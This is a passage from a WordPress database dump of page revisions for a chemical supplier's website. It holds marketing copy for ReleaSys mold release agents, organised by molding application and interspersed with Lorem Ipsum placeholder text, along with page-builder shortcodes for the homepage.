src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-116-340x340.jpg" alt="heloxy-116" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Polyurethane Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4289 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609-340x340.jpg" alt="Concrete Release Agent" width="170" height="170" /></p>\r\n<img class="wp-image-1897 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-872-340x340.jpg" alt="epon-872" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Rubber Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\n<img class="wp-image-1890 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825-340x340.jpg" alt="EPON 825 EPON Resin 825" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\n<img class="wp-image-1894 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-830-340x340.jpg" alt="Epon 830" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n<p class="alignnone"><img class="wp-image-1877 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140-340x340.jpg" alt="Epikure 3140 Curing agent" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\n<img class="wp-image-1884 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290-340x340.jpg" alt="epikure-3290" width="170" height="170" />\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-31 13:38:20', '2017-05-31 13:38:20', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4358, 2, '2017-05-31 13:45:38', '2017-05-31 13:45:38', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="ABOUT US" color="white" style="outline" size="xlarge" radius="62" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" position_x="100" position_y="0"]\n\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Custom Solutions</h3>\n<p>Custom-built mold release agent, specialty coating or unique formulation. Our engineering department can design a solution for your application needs.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Large Inventory</h3>\n<p>Our fully stocked USA & Canadian locations allow us to ensure swift delivery. Vast KRYTOX inventory of most grades at bulk pricing.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Eco Friendly</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/featured_box]\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle" link="https://www.miller-stephenson.com/releasys-release-agent/"]\n\n[text_box width="47" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys™ </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" color="white" style="outline" radius="82" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-31 13:45:38', '2017-05-31 13:45:38', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4359, 0, '2017-05-31 13:53:33', '2017-05-31 13:53:33', '', '', '', 'publish', 'closed', 'closed', '', '4359', '', '', '2017-05-31 13:53:34', '2017-05-31 13:53:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/4359/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4360, 3, '2017-05-31 14:14:53', '2017-05-31 14:14:53', '', 'shutterstock_507408157', '', 'inherit', 'closed', 'closed', '', 'shutterstock_507408157', '', '', '2017-05-31 14:14:53', '2017-05-31 14:14:53', '', 4321, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_507408157.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4361, 0, '2017-05-31 14:18:01', '2017-05-31 14:18:01', '', '', '', 'publish', 'closed', 'closed', '', '4361', '', '', '2017-05-31 14:18:01', '2017-05-31 14:18:01', '', 0, 'https://www.miller-stephenson.com/nf_sub/4361/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4362, 0, '2017-05-31 14:30:26', '2017-05-31 14:30:26', '', '', '', 'publish', 'closed', 'closed', '', '4362', '', '', '2017-05-31 14:30:26', '2017-05-31 14:30:26', '', 0, 'https://www.miller-stephenson.com/nf_sub/4362/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4363, 3, '2017-05-31 14:47:33', '2017-05-31 14:47:33', '<h3 style="text-align: left;"><strong>Choosing ReleaSys<em>™</em> By Application</strong></h3>\r\nMiller-Stephenson\'s exclusive mold release product line, ReleaSys<em>™</em> , offers technologically advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness.  However it is not always easy for engineers and plant managers to know which grade of ReleaSys would perform best in their manufacturing operation.  Criteria such as mold geometry, mold temperature, substrate, application method, etc all play a key role in deciding the best release agent for your application.  To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.  If after review of these categories you remain unsure of which grade is optimized for your molding application please contact our technical specialist at <strong>203-743-4447</strong> or submitting an inquiry to our <a href="https://www.miller-stephenson.com/tech-support/">Tech-Support team here.</a>\r\n\r\n&nbsp;\r\n<h2><strong>Advanced Composites/FRP </strong></h2>\r\n<div>\r\n\r\n<img class=" wp-image-1918 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-505-340x340.jpg" alt="heloxy-505" width="170" height="170" /><img class="alignleft wp-image-4351" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_469809758-340x340.jpg" alt="shutterstock_469809758" width="170" height="170" />Modern composites and fiber-reinforced materials are high performance substrates demand innovative mold release solutions to facilitate consistent and cost-effective release characteristics.  Mold releases for this application typically need to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer.  ReleaSys technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers. Simply coat, cure, and mold.\r\n\r\nMiller-Stephenson strongly recommends use of <strong>ReleaSys 9900</strong>, our water-based, no VOC, and rapidly curing release agent and <strong>ReleaSys 8900</strong>, our solvent-based, low odor semi-permanent release polymer.\r\n\r\n</div>\r\n&nbsp;\r\n<h2><strong>Rotational Plastics </strong></h2>\r\n<img class="wp-image-4360  alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_507408157-800x534.jpg" width="205" height="137" />\r\n\r\n<img class="wp-image-1917 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-116-340x340.jpg" alt="heloxy-116" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<h2 style="text-align: left;"><strong>Polyurethane (Rigid, Elastomers, Flexible Foam, Skin)</strong></h2>\r\n<p style="text-align: left;"><img class=" wp-image-4289 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609-340x340.jpg" alt="Concrete Release Agent" width="170" height="170" /></p>\r\n<img class="wp-image-1897 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-872-340x340.jpg" alt="epon-872" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Rubber Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_375261412-340x340.jpg" alt="ReleaSys 8500 Rubber mold release agent" width="170" height="170" /></p>\r\n<img class="wp-image-1890 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825-340x340.jpg" alt="EPON 825 EPON Resin 825" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Injection Plastics Mold Release</strong></h4>\r\n<img class=" wp-image-4105 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_280244540-340x340.jpg" alt="Industrial Wire Coatings" width="170" height="170" />\r\n\r\n<img class="wp-image-1894 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-830-340x340.jpg" alt="Epon 830" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Fiberglass Mold Release</strong></h4>\r\n<img class="wp-image-4102 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_195767891-340x340.jpg" alt="industrial-medical coatings" width="170" height="170" />\r\n<p class="alignnone"><img class="wp-image-1877 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3140-340x340.jpg" alt="Epikure 3140 Curing agent" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.</p>\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n<h4></h4>\r\n<h4><strong>Pre-Cast Mold Release Mold Release</strong></h4>\r\n<img class="wp-image-3723 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_359496941-340x340.jpg" alt="Krytox GB A2" width="170" height="170" />\r\n\r\n<img class="wp-image-1884 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3290-340x340.jpg" alt="epikure-3290" width="170" height="170" />\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-05-31 14:47:33', '2017-05-31 14:47:33', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4364, 3, '2017-05-31 15:17:08', '2017-05-31 15:17:08', '<h3 style="text-align: left;"><strong>Choosing ReleaSys<em>™</em> By Application</strong></h3>\r\nMiller-Stephenson\'s exclusive mold release product line, ReleaSys<em>™</em> , offers technologically advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness.  However it is not always easy for engineers and plant managers to know which grade of ReleaSys would perform best in their manufacturing operation.  Criteria such as mold geometry, mold temperature, substrate, application method, etc all play a key role in deciding the best release agent for your application.  To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.  If after review of these categories you remain unsure of which grade is optimized for your molding application please contact our technical specialist at <strong>203-743-4447</strong> or submitting an inquiry to our <a href="https://www.miller-stephenson.com/tech-support/">Tech-Support team here.</a>\r\n\r\n&nbsp;\r\n<h2><strong>Advanced Composites/FRP </strong></h2>\r\n<div>\r\n\r\n<img class=" wp-image-1918 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-505-340x340.jpg" alt="heloxy-505" width="170" height="170" /><img class="alignleft wp-image-4351" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_469809758-340x340.jpg" alt="shutterstock_469809758" width="170" height="170" />Modern composites and fiber-reinforced materials are high performance substrates demand innovative mold release solutions to facilitate consistent and cost-effective release characteristics.  Mold releases for this application typically need to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer.  ReleaSys technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers. Simply coat, cure, and mold.\r\n\r\nMiller-Stephenson strongly recommends use of <strong>ReleaSys 9900</strong>, our water-based, no VOC, and rapidly curing release agent and <strong>ReleaSys 8900</strong>, our solvent-based, low odor semi-permanent release polymer.\r\n\r\n</div>\r\n&nbsp;\r\n<h2><strong>Rotational Plastics </strong></h2>\r\n<img class="wp-image-4360 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_507408157-800x534.jpg" width="205" height="137" />\r\n\r\n<img class="wp-image-1917 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-116-340x340.jpg" alt="heloxy-116" width="170" height="170" />Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discovered the undoubtable source. Lorem Ipsum comes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum et Malorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC. This book is a treatise on the theory of ethics, very popular during the Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sit amet..", comes from a line in section 1.10.32.\r\n\r\nThe standard chunk of Lorem Ipsum used since the 1500s is reproduced below for those interested. Sections 1.10.32 and 1.10.33 from "de Finibus Bonorum et Malorum" by Cicero are also reproduced in their exact original form, accompanied by English versions from the 1914 translation by H. Rackham.\r\n<h2 style="text-align: left;"><strong>Polyurethane (Rigid, Elastomers, Flexible Foam, Skin)</strong></h2>\r\n<p style="text-align: left;"><img class=" wp-image-4289 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_116206609-340x340.jpg" alt="Concrete Release Agent" width="170" height="170" /></p>\r\n<img class="wp-image-1897 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-872-340x340.jpg" alt="epon-872" width="170" height="170" />Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants polyurethane molding (High Resilency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands of a release agent very high.  Miller-Stephenson\'s ReleaSys release systems has specially designed formulations to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenacious to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass provide critical protection to your mold surface and highly effective release properties.\r\n\r\nMiller-Stephenson strongly recommends ReleaSys 8800 or ReleaSys 9800 for water-based applications and ReleaSys 8900 if solvent-based carrier fluids is desired.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"></h4>\r\n<h4 style="text-align: left;"><strong>Rubber Mold Release</strong></h4>\r\n<p style="text-align: left;"><img class=" wp-image-4179 alignleft" 